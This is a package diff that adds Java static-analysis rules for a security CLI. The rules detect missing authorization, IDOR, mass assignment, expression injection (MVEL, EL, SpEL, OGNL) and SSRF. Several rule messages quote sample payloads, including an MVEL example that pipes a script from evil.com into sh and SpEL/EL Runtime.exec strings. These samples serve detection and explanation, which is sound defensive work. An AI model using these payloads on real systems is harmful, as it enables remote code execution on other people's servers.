@zhuma4/cli 4.0.0-alpha.1

package/rules/common/zm-java-cwe862-authz-depth.yaml

@@ -0,0 +1,127 @@
+# CWE-862/863 权限控制深度覆盖: IDOR/Forced Browsing/Missing Function-Level Access
+
+rules:
+
+# ZM-JAVA-AUTHZ-LACKING-001: 控制器方法缺少安全注解
+- id: zm-java-authz-lacking-001
+  severity: HIGH
+  message: |
+    Spring MVC 控制器有 @GetMapping/@PostMapping 但无 @PreAuthorize/@Secured/@RolesAllowed。
+    检查是否外部 SecurityFilterChain 统一保护，否则存在未授权访问风险。
+  languages:
+    - java
+  pattern: |
+    @$CONTROLLER
+    class $CLASS {
+      ...
+      @GetMapping($PATH)
+      $TYPE $METHOD(...) {
+        ...
+      }
+      ...
+    }
+  pattern-not: |
+    @$CONTROLLER
+    class $CLASS {
+      ...
+      @PreAuthorize($X)
+      @GetMapping($PATH)
+      $TYPE $METHOD(...) {
+        ...
+      }
+      ...
+    }
+  metadata:
+    cwe: "CWE-862: Missing Authorization"
+    owasp: "A01:2021 - Broken Access Control"
+    precision: low
+    tags: [authorization, spring-security, access-control]
+    references:
+      - https://docs.spring.io/spring-security/reference/servlet/authorization/method-security.html
+
+# ZM-JAVA-IDOR-PATH-001: 路径变量直接用于数据库操作（无拥有者校验）
+- id: zm-java-idor-path-001
+  severity: HIGH
+  message: |
+    @PathVariable 直接传入 DAO/Repository 方法 — 可能存在 IDOR。
+    校验当前用户是否有权访问该资源，或使用 UUID 替代自增 ID。
+  languages:
+    - java
+  pattern-either:
+    - pattern: |
+        @GetMapping($PATH)
+        $TYPE $METHOD(@PathVariable("id") $ID) {
+          ...
+          $REPO.findById($ID);
+          ...
+        }
+    - pattern: |
+        @DeleteMapping($PATH)
+        $TYPE $METHOD(@PathVariable("id") $ID) {
+          ...
+          $REPO.deleteById($ID);
+          ...
+        }
+  metadata:
+    cwe: "CWE-639: Authorization Bypass Through User-Controlled Key (IDOR)"
+    owasp: "A01:2021 - Broken Access Control"
+    precision: medium
+    tags: [idor, spring-data, access-control]
+
+# ZM-JAVA-IDOR-ENTITY-001: Entity 对象直接从请求体映射后持久化
+- id: zm-java-idor-entity-001
+  severity: HIGH
+  message: |
+    @RequestBody 直接映射为 JPA Entity 后 save — 攻击者可篡改 ID/owner 字段。
+    使用 DTO + 显式字段映射，或 @JsonIgnoreProperties 禁止客户端设置敏感字段。
+  languages:
+    - java
+  pattern-either:
+    - pattern: |
+        @PostMapping($PATH)
+        $TYPE $METHOD(@RequestBody $ENTITY $VAR) {
+          ...
+          $REPO.save($VAR);
+          ...
+        }
+    - pattern: |
+        $REPO.save($VAR)
+  metadata:
+    cwe: "CWE-915: Improperly Controlled Modification of Dynamically-Determined Object Attributes"
+    owasp: "A01:2021 - Broken Access Control"
+    precision: medium
+    tags: [mass-assignment, spring-data, idor]
+
+# ZM-JAVA-AUTHZ-ANNOTATION-001: @PreAuthorize 表达式使用 permitAll() 在生产路由
+- id: zm-java-authz-permit-all-001
+  severity: LOW
+  message: |
+    @PreAuthorize("permitAll()") 允许未认证用户访问 — 如果是生产环境中敏感路由，移除或改为 authenticated()。
+  languages:
+    - java
+  pattern: |
+    @PreAuthorize("permitAll()")
+  metadata:
+    cwe: "CWE-862: Missing Authorization"
+    owasp: "A01:2021 - Broken Access Control"
+    precision: very-high
+    tags: [authorization, spring-security]
+
+# ZM-JAVA-SECURITY-CONTEXT-001: SecurityContextHolder 直接检查角色名（字符串硬编码）
+- id: zm-java-security-ctx-001
+  severity: LOW
+  message: |
+    SecurityContextHolder.getContext().getAuthentication() 后直接字符串比较角色 —
+    推荐使用 @PreAuthorize("hasRole('ADMIN')") 注解，更声明式且不易出错。
+  languages:
+    - java
+  pattern-either:
+    - pattern: |
+        SecurityContextHolder.getContext().getAuthentication().getAuthorities()
+    - pattern: |
+        $AUTH.hasRole($ROLE)
+  metadata:
+    cwe: "CWE-862: Missing Authorization"
+    owasp: "A01:2021 - Broken Access Control"
+    precision: low
+    tags: [authorization, security-context, spring-security]

package/rules/common/zm-java-cwe915-mass-assignment.yaml

@@ -0,0 +1,16 @@
+# CWE-915: Mass Assignment 过度绑定检测
+rules:
+- id: zm-java-mass-01
+  severity: WARNING
+  message: "@ModelAttribute 直接绑定到 JPA Entity，攻击者可通过请求体注入敏感字段。"
+  languages: [java]
+  pattern-either:
+    - pattern: $REPO.save($VAR)
+  metadata: { cwe: "CWE-915", precision: low, category: injection, owasp: "A08:2021" }
+
+- id: zm-java-mass-02
+  severity: WARNING
+  message: "BeanUtils.copyProperties() 全属性复制，攻击者可覆盖敏感字段（如 role/admin）。"
+  languages: [java]
+  pattern: BeanUtils.copyProperties($SRC, $DST)
+  metadata: { cwe: "CWE-915", precision: medium, category: injection, owasp: "A08:2021" }

package/rules/common/zm-java-cwe917-expression-injection.yaml

@@ -0,0 +1,120 @@
+# CWE-917: Java OGNL/MVEL/EL 表达式注入深度检测
+# 逐码 ZhuMa V4.1 Sprint — Java 规则库
+# 覆盖: ExpressionEvaluator + userInput / MVEL 全量sink
+
+rules:
+
+# ZM-JAVA-EXPR-001: MVEL 表达式注入
+- id: zm-java-expr-001
+  severity: ERROR
+  message: |
+    MVEL.eval() / MVEL.executeExpression() 的参数由用户输入控制，可导致任意代码执行。
+    MVEL 表达式支持方法调用、new 操作符、反射等高级特性，是完整的表达式语言。
+
+    攻击Payload示例:
+    Runtime.getRuntime().exec("curl http://evil.com/shell.sh | sh")
+    或通过反射: java.lang.Runtime.getRuntime().exec(...)
+
+    修复:
+    1. 禁止用户输入直接传入MVEL执行
+    2. 如必须动态表达式，使用严格白名单的变量+简单表达式语法
+    3. 使用 MVEL 沙箱: ParserContext + 禁用 imports
+    4. 替换为安全的模板引擎(如 Mustache)
+  languages:
+    - java
+  pattern-either:
+    - pattern: MVEL.eval($INPUT, ...)
+    - pattern: MVEL.eval($INPUT)
+    - pattern: MVEL.executeExpression($INPUT, ...)
+    - pattern: MVEL.executeExpression($EXPR, $INPUT)
+    - pattern: MVEL.compileExpression($INPUT, ...)
+    - pattern: MVEL.executeSetExpression($INPUT, ...)
+  metadata:
+    cwe: "CWE-917: Improper Neutralization of Special Elements used in an Expression Language Statement (Expression Language Injection)"
+    severity: ERROR
+    precision: high
+    category: expression-injection
+    likelihood: HIGH
+    impact: CRITICAL
+    owasp: "A03:2021 - Injection"
+    references:
+      - "https://mvel.documentnode.com/"
+      - "https://portswigger.net/web-security/server-side-template-injection"
+
+# ZM-JAVA-EXPR-002: javax.el / Jakarta EL 表达式注入
+- id: zm-java-expr-002
+  severity: ERROR
+  message: |
+    检测到 javax.el.ExpressionFactory / jakarta.el.ExpressionFactory 创建表达式时
+    表达式字符串由用户输入控制，可导致EL表达式注入。
+
+    EL表达式支持方法调用:
+    #{bean.getClass().forName('java.lang.Runtime').getRuntime().exec('cmd')}
+
+    修复:
+    1. 禁止用户输入直接作为EL表达式
+    2. 使用 ELProcessor.setVariable 设置只读变量
+    3. 使用 StandardELContext + 禁用的 ELResolver
+    4. 对用户输入进行严格的白名单校验(仅允许简单属性访问)
+  languages:
+    - java
+  pattern-either:
+    - pattern: |
+        $FACTORY.createValueExpression($CONTEXT, $INPUT, $CLASS)
+    - pattern: |
+        $FACTORY.createMethodExpression($CONTEXT, $INPUT, $RTYPE, $PARAMS)
+    - pattern: |
+        $PROCESSOR.eval($INPUT)
+    - pattern: |
+        $PROCESSOR.getValue($INPUT, $CLASS)
+    - pattern: |
+        $ENGINE.eval($INPUT)
+  metadata:
+    cwe: "CWE-917: Improper Neutralization of Special Elements used in an Expression Language Statement (Expression Language Injection)"
+    severity: ERROR
+    precision: high
+    category: expression-injection
+    likelihood: HIGH
+    impact: CRITICAL
+    owasp: "A03:2021 - Injection"
+    references:
+      - "https://docs.oracle.com/javaee/7/tutorial/jsf-el.htm"
+
+# ZM-JAVA-EXPR-003: Spring ExpressionEvaluator 用户输入评估
+- id: zm-java-expr-003
+  severity: ERROR
+  message: |
+    检测到 Spring ExpressionParser.parseExpression() 的表达式由用户输入直接构造，
+    或 Expression.getValue() 在不可信上下文中执行。
+
+    SpEL payload 示例:
+    T(java.lang.Runtime).getRuntime().exec('calc')
+    #{T(java.lang.Runtime).getRuntime().exec('cmd')}
+    new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec('id').getInputStream()).useDelimiter('\\A').next()
+
+    修复:
+    1. 使用 SimpleEvaluationContext 替代 StandardEvaluationContext
+    2. SimpleEvaluationContext 默认禁用类型引用(T操作符)、构造器调用、方法引用
+    3. 使用 ExpressionParser 的 setVariable 方法而非拼接表达式字符串
+    4. 对用户输入做严格白名单过滤
+  languages:
+    - java
+  pattern-either:
+    - pattern: |
+        $PARSER.parseExpression($INPUT)
+    - pattern: |
+        $PARSER.parseExpression($INPUT + $Y)
+    - pattern: |
+        $EXP.getValue($CONTEXT)
+    - pattern: |
+        $EXP.getValue()
+  metadata:
+    cwe: "CWE-917: Improper Neutralization of Special Elements used in an Expression Language Statement (Expression Language Injection)"
+    severity: ERROR
+    precision: medium
+    category: expression-injection
+    likelihood: HIGH
+    impact: CRITICAL
+    owasp: "A03:2021 - Injection"
+    references:
+      - "https://docs.spring.io/spring-framework/docs/current/reference/html/core.html#expressions"

package/rules/common/zm-java-cwe918-resttemplate.yaml

@@ -0,0 +1,67 @@
+# CWE-918: SSRF — RestTemplate URL 参数可控检测
+# 逐码 ZhuMa V4.1
+
+rules:
+
+- id: zm-java-ssrf-rt-001
+  severity: WARNING
+  message: |
+    RestTemplate.getForObject/postForObject() URL 参数来自 HTTP 请求，可导致 SSRF。
+    修复: 1.白名单域名校验 2.DNS解析后检查IP非内网 3.禁用自动重定向
+  languages:
+    - java
+  pattern-either:
+    - pattern: |
+        $RT.getForObject($REQ.getParameter($PARAM), ...)
+    - pattern: |
+        $RT.postForObject($REQ.getParameter($PARAM), ...)
+  metadata:
+    cwe: "CWE-918"
+    severity: WARNING
+    precision: medium
+    category: ssrf
+    likelihood: HIGH
+    impact: HIGH
+    owasp: "A10:2021 - SSRF"
+
+- id: zm-java-ssrf-rt-002
+  severity: WARNING
+  message: |
+    RestTemplate.exchange() URL 参数用户可控，可能导致 SSRF。
+    修复: 1.白名单域名校验 2.DNS解析验证IP 3.禁用自动重定向
+  languages:
+    - java
+  pattern-either:
+    - pattern: |
+        $RT.exchange($REQ.getParameter($PARAM), ...)
+  metadata:
+    cwe: "CWE-918"
+    severity: WARNING
+    precision: medium
+    category: ssrf
+    likelihood: HIGH
+    impact: HIGH
+    owasp: "A10:2021 - SSRF"
+
+- id: zm-java-ssrf-rt-003
+  severity: WARNING
+  message: |
+    RestTemplate URL 由用户输入拼接构造，可能导致 SSRF。
+    修复: 1.UriComponentsBuilder+白名单host 2.校验拼装后完整URL域名 3.对path参数严格过滤
+  languages:
+    - java
+  pattern-either:
+    - pattern: |
+        $RT.getForObject($BASE + $REQ.getParameter($PARAM), ...)
+    - pattern: |
+        $RT.postForObject($BASE + $REQ.getParameter($PARAM), ...)
+    - pattern: |
+        $RT.exchange($BASE + $REQ.getParameter($PARAM), ...)
+  metadata:
+    cwe: "CWE-918"
+    severity: WARNING
+    precision: medium
+    category: ssrf
+    likelihood: MEDIUM
+    impact: HIGH
+    owasp: "A10:2021 - SSRF"

package/rules/common/zm-java-cwe918-ssrf-depth.yaml

@@ -0,0 +1,103 @@
+# CWE-918 SSRF 深度覆盖 (v2): 全量Java HTTP客户端sink
+# 补漏: 原始 cwe-918-ssrf.yaml 仅覆盖Url/HttpURLConnection/RestTemplate/WebClient
+# 本文件追加: Feign / OkHttp / Apache HttpClient 4/5 / java.net.URL 全量变体
+
+rules:
+
+# ZM-JAVA-SSRF-OKHTTP-001: OkHttp3/4 请求URL由用户输入控制
+- id: zm-java-ssrf-okhttp-001
+  severity: MEDIUM
+  message: |
+    OkHttp 请求 URL 由用户输入控制，可能导致 SSRF。
+    校验 URL 白名单或使用 DNS 解析校验（如 `InetAddress.getAllByName`）。
+  languages:
+    - java
+  pattern-either:
+    - pattern: |
+        $REQ = $HTTP.newBuilder().url($INPUT).build();
+        $CLIENT.newCall($REQ).execute();
+    - pattern: |
+        $HTTP.url($INPUT).build();
+    - pattern: |
+        $B = new Request.Builder().url($INPUT);
+  metadata:
+    cwe: "CWE-918: Server-Side Request Forgery (SSRF)"
+    owasp: "A10:2021 - Server-Side Request Forgery"
+    precision: high
+    tags: [ssrf, okhttp, http-client]
+    references:
+      - https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html
+
+# ZM-JAVA-SSRF-APACHE-HTTP: Apache HttpClient 4.x / 5.x 请求URL由用户控制
+- id: zm-java-ssrf-apache-http-001
+  severity: MEDIUM
+  message: |
+    Apache HttpClient 请求 URL 由用户输入控制，可能导致 SSRF。
+    使用 `HttpClientBuilder.setDefaultRequestConfig` 限制重定向或校验目标 IP 白名单。
+  languages:
+    - java
+  pattern-either:
+    - pattern: |
+        $CLIENT.execute(new HttpGet($INPUT));
+    - pattern: |
+        $CLIENT.execute(new HttpPost($INPUT));
+    - pattern: |
+        $CLIENT.execute(new HttpPut($INPUT));
+    - pattern: |
+        $HTTP = HttpClients.createDefault();
+        ...
+        $HTTP.execute(new HttpGet($INPUT));
+    - pattern: |
+        $CLIENT.execute(new HttpGet($INPUT), $RESPONSE);
+    - pattern: |
+        $B = RequestBuilder.get($INPUT);
+  metadata:
+    cwe: "CWE-918: Server-Side Request Forgery (SSRF)"
+    owasp: "A10:2021 - Server-Side Request Forgery"
+    precision: high
+    tags: [ssrf, apache-httpclient]
+    references:
+      - https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html
+
+# ZM-JAVA-SSRF-URL-BARE: java.net.URL openConnection/openStream 由用户控制
+- id: zm-java-ssrf-url-001
+  severity: MEDIUM
+  message: |
+    java.net.URL 对象由用户输入构造，调用 openConnection/openStream 可触发 SSRF。
+    先校验域名/IP 是否在白名单内，或限制协议仅 http/https。
+  languages:
+    - java
+  pattern-either:
+    - pattern: new URL($INPUT).openConnection()
+    - pattern: new URL($INPUT).openStream()
+    - pattern: new URL($INPUT).getContent()
+    - pattern: $U = new URL($INPUT);
+    - pattern: URI.create($INPUT)
+  metadata:
+    cwe: "CWE-918: Server-Side Request Forgery (SSRF)"
+    owasp: "A10:2021 - Server-Side Request Forgery"
+    precision: high
+    tags: [ssrf, java-net-url]
+    references:
+      - https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html
+
+# ZM-JAVA-SSRF-FEIGN: Feign Client 动态URL
+- id: zm-java-ssrf-feign-001
+  severity: MEDIUM
+  message: |
+    Feign Client @RequestLine 注解中 URL 使用字符串拼接或 @Param 传入。
+    使用固定 baseUrl + @RequestLine 相对路径，避免用户可控的完整 URL。
+  languages:
+    - java
+  pattern-either:
+    - pattern: |
+        $FEIGN.target($TARGET, $INPUT);
+    - pattern: |
+        $FEIGN = Feign.builder().target($T, $INPUT);
+  metadata:
+    cwe: "CWE-918: Server-Side Request Forgery (SSRF)"
+    owasp: "A10:2021 - Server-Side Request Forgery"
+    precision: medium
+    tags: [ssrf, feign]
+    references:
+      - https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html

package/rules/common/zm-java-cwe918-ssrf-resttemplate.yaml

@@ -0,0 +1,77 @@
+# CWE-918: SSRF — RestTemplate deeper variants
+# ZhuMa V4.1 — complement zm-java-cwe918-resttemplate.yaml and webclient.yaml
+
+rules:
+
+# ZM-JAVA-SSRF-RT-DEEP-001: RestTemplate.execute() with user-controlled URL
+- id: zm-java-ssrf-rt-deep-001
+  severity: MEDIUM
+  message: |
+    RestTemplate.execute() URL from HTTP parameter — SSRF via low-level execute method.
+    Fix: validate URL hostname against whitelist before calling execute().
+  languages:
+    - java
+  pattern-either:
+    - pattern: |
+        $RT.execute($REQ.getParameter(...), $METHOD, $CB, $VARS)
+    - pattern: |
+        $RT.execute($REQ.getParameter(...), HttpMethod.GET, $CB)
+    - pattern: |
+        $RT.execute($REQ.getParameter(...), HttpMethod.POST, $CB)
+  metadata:
+    cwe: "CWE-918: Server-Side Request Forgery (SSRF)"
+    severity: MEDIUM
+    precision: medium
+    category: ssrf
+    likelihood: HIGH
+    impact: HIGH
+    owasp: "A10:2021 - SSRF"
+
+# ZM-JAVA-SSRF-RT-DEEP-002: RestTemplate URI variables from user input
+- id: zm-java-ssrf-rt-deep-002
+  severity: MEDIUM
+  message: |
+    RestTemplate String.format-ed URL + user-controlled path segment — SSRF via URI template injection.
+    Attacker may inject "../" or "@evil.com" into the path variable.
+    Fix: validate path segments; use UriComponentsBuilder for strict URI construction.
+  languages:
+    - java
+  pattern-either:
+    - pattern: |
+        $RT.getForObject(String.format($FMT, $REQ.getParameter(...)), ...)
+    - pattern: |
+        $RT.exchange(String.format($FMT, $REQ.getParameter(...)), ...)
+    - pattern: |
+        $RT.getForEntity(String.format($FMT, $REQ.getParameter(...)), ...)
+  metadata:
+    cwe: "CWE-918: Server-Side Request Forgery (SSRF)"
+    severity: MEDIUM
+    precision: medium
+    category: ssrf
+    likelihood: MEDIUM
+    impact: HIGH
+    owasp: "A10:2021 - SSRF"
+
+# ZM-JAVA-SSRF-RT-DEEP-003: UriComponentsBuilder from user-controlled host
+- id: zm-java-ssrf-rt-deep-003
+  severity: MEDIUM
+  message: |
+    UriComponentsBuilder host/port/scheme from user input — attacker controls full URI authority.
+    This allows SSRF to any internal IP/service. Fix: hardcode scheme/host; only allow path/query from user.
+  languages:
+    - java
+  pattern-either:
+    - pattern: |
+        UriComponentsBuilder.newInstance().host($REQ.getParameter(...)).build()
+    - pattern: |
+        UriComponentsBuilder.newInstance().scheme($REQ.getParameter(...)).build()
+    - pattern: |
+        UriComponentsBuilder.fromUriString($REQ.getParameter(...)).build()
+  metadata:
+    cwe: "CWE-918: Server-Side Request Forgery (SSRF)"
+    severity: MEDIUM
+    precision: high
+    category: ssrf
+    likelihood: MEDIUM
+    impact: HIGH
+    owasp: "A10:2021 - SSRF"

package/rules/common/zm-java-cwe918-webclient.yaml

@@ -0,0 +1,44 @@
+# CWE-918: SSRF — Spring WebClient URI 参数可控检测
+# V4.1 - 单语句模式，避免跨语句 ... 导致的 PatternParseError
+
+rules:
+
+- id: zm-java-ssrf-wc-001
+  severity: WARNING
+  message: |
+    Spring WebClient get/post uri() from HTTP request param - user-controllable, can cause SSRF.
+    Fix: whitelist domain validation / DNS resolve verify non-internal IP / use UriComponentsBuilder.
+  languages:
+    - java
+  pattern-either:
+    - pattern: WebClient.create().get().uri($REQ.getParameter($PARAM))
+    - pattern: WebClient.create().post().uri($REQ.getParameter($PARAM))
+    - pattern: $WC.get().uri($REQ.getParameter($PARAM))
+    - pattern: $WC.post().uri($REQ.getParameter($PARAM))
+  metadata:
+    cwe: "CWE-918"
+    severity: WARNING
+    precision: high
+    category: ssrf
+    likelihood: HIGH
+    impact: HIGH
+    owasp: "A10:2021 - SSRF"
+
+- id: zm-java-ssrf-wc-002
+  severity: WARNING
+  message: |
+    WebClient baseUrl from user input - attacker controls baseUrl to redirect to malicious server.
+    Fix: hardcode domain whitelist for baseUrl / never use user input as baseUrl.
+  languages:
+    - java
+  pattern-either:
+    - pattern: WebClient.builder().baseUrl($REQ.getParameter($PARAM)).build()
+    - pattern: WebClient.builder().baseUrl($REQ.getParameter($PARAM))
+  metadata:
+    cwe: "CWE-918"
+    severity: WARNING
+    precision: high
+    category: ssrf
+    likelihood: MEDIUM
+    impact: HIGH
+    owasp: "A10:2021 - SSRF"

package/rules/common/zm-java-cwe94-ognl.yaml

@@ -0,0 +1,66 @@
+# CWE-94: OGNL 表达式注入检测
+# 逐码 ZhuMa V4.1
+
+rules:
+
+- id: zm-java-ognl-001
+  severity: ERROR
+  message: |
+    Ognl.parseExpression() 参数由 HTTP 请求参数传入，可导致 OGNL 注入 RCE。
+    修复: 1.禁止用户输入传入OGNL 2.Struts2参数白名单拦截器 3.启用strict-method-invocation
+    参考: CVE-2017-5638 (S2-045), CVE-2018-11776 (S2-057)
+  languages:
+    - java
+  pattern-either:
+    - pattern: |
+        Ognl.parseExpression($REQ.getParameter($PARAM))
+    - pattern: |
+        Ognl.parseExpression($REQ.getHeader($PARAM))
+  metadata:
+    cwe: "CWE-94"
+    severity: ERROR
+    precision: high
+    category: code-injection
+    likelihood: HIGH
+    impact: CRITICAL
+    owasp: "A03:2021 - Injection"
+
+- id: zm-java-ognl-002
+  severity: ERROR
+  message: |
+    Ognl.getValue() 表达式参数可能由用户输入构造，可导致任意代码执行。
+    修复: 1.禁止用户输入直接作为OGNL表达式 2.OgnlContext安全配置 3.替换为安全模板引擎
+  languages:
+    - java
+  pattern-either:
+    - pattern: |
+        Ognl.getValue($REQ.getParameter($PARAM), ...)
+  metadata:
+    cwe: "CWE-94"
+    severity: ERROR
+    precision: medium
+    category: code-injection
+    likelihood: MEDIUM
+    impact: CRITICAL
+    owasp: "A03:2021 - Injection"
+
+- id: zm-java-ognl-003
+  severity: HIGH
+  message: |
+    Ognl.parseExpression() 参数由变量拼接，若变量用户可控可导致OGNL注入RCE。
+    修复: 1.追踪变量来源 2.白名单表达式映射 3.严格校验表达式内容
+  languages:
+    - java
+  pattern-either:
+    - pattern: |
+        Ognl.parseExpression($EXPR + $Y)
+    - pattern: |
+        Ognl.parseExpression($EXPR)
+  metadata:
+    cwe: "CWE-94"
+    severity: HIGH
+    precision: low
+    category: code-injection
+    likelihood: MEDIUM
+    impact: CRITICAL
+    owasp: "A03:2021 - Injection"